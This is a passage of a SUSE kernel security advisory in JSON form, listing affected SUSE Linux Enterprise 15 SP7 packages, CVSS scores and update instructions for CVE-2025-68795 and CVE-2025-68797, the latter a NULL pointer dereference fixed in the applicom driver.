"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68797",
"url": "https://www.suse.com/security/cve/CVE-2025-68797"
},
{
"category": "external",
"summary": "SUSE Bug 1256660 for CVE-2025-68797",
"url": "https://bugzilla.suse.com/1256660"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
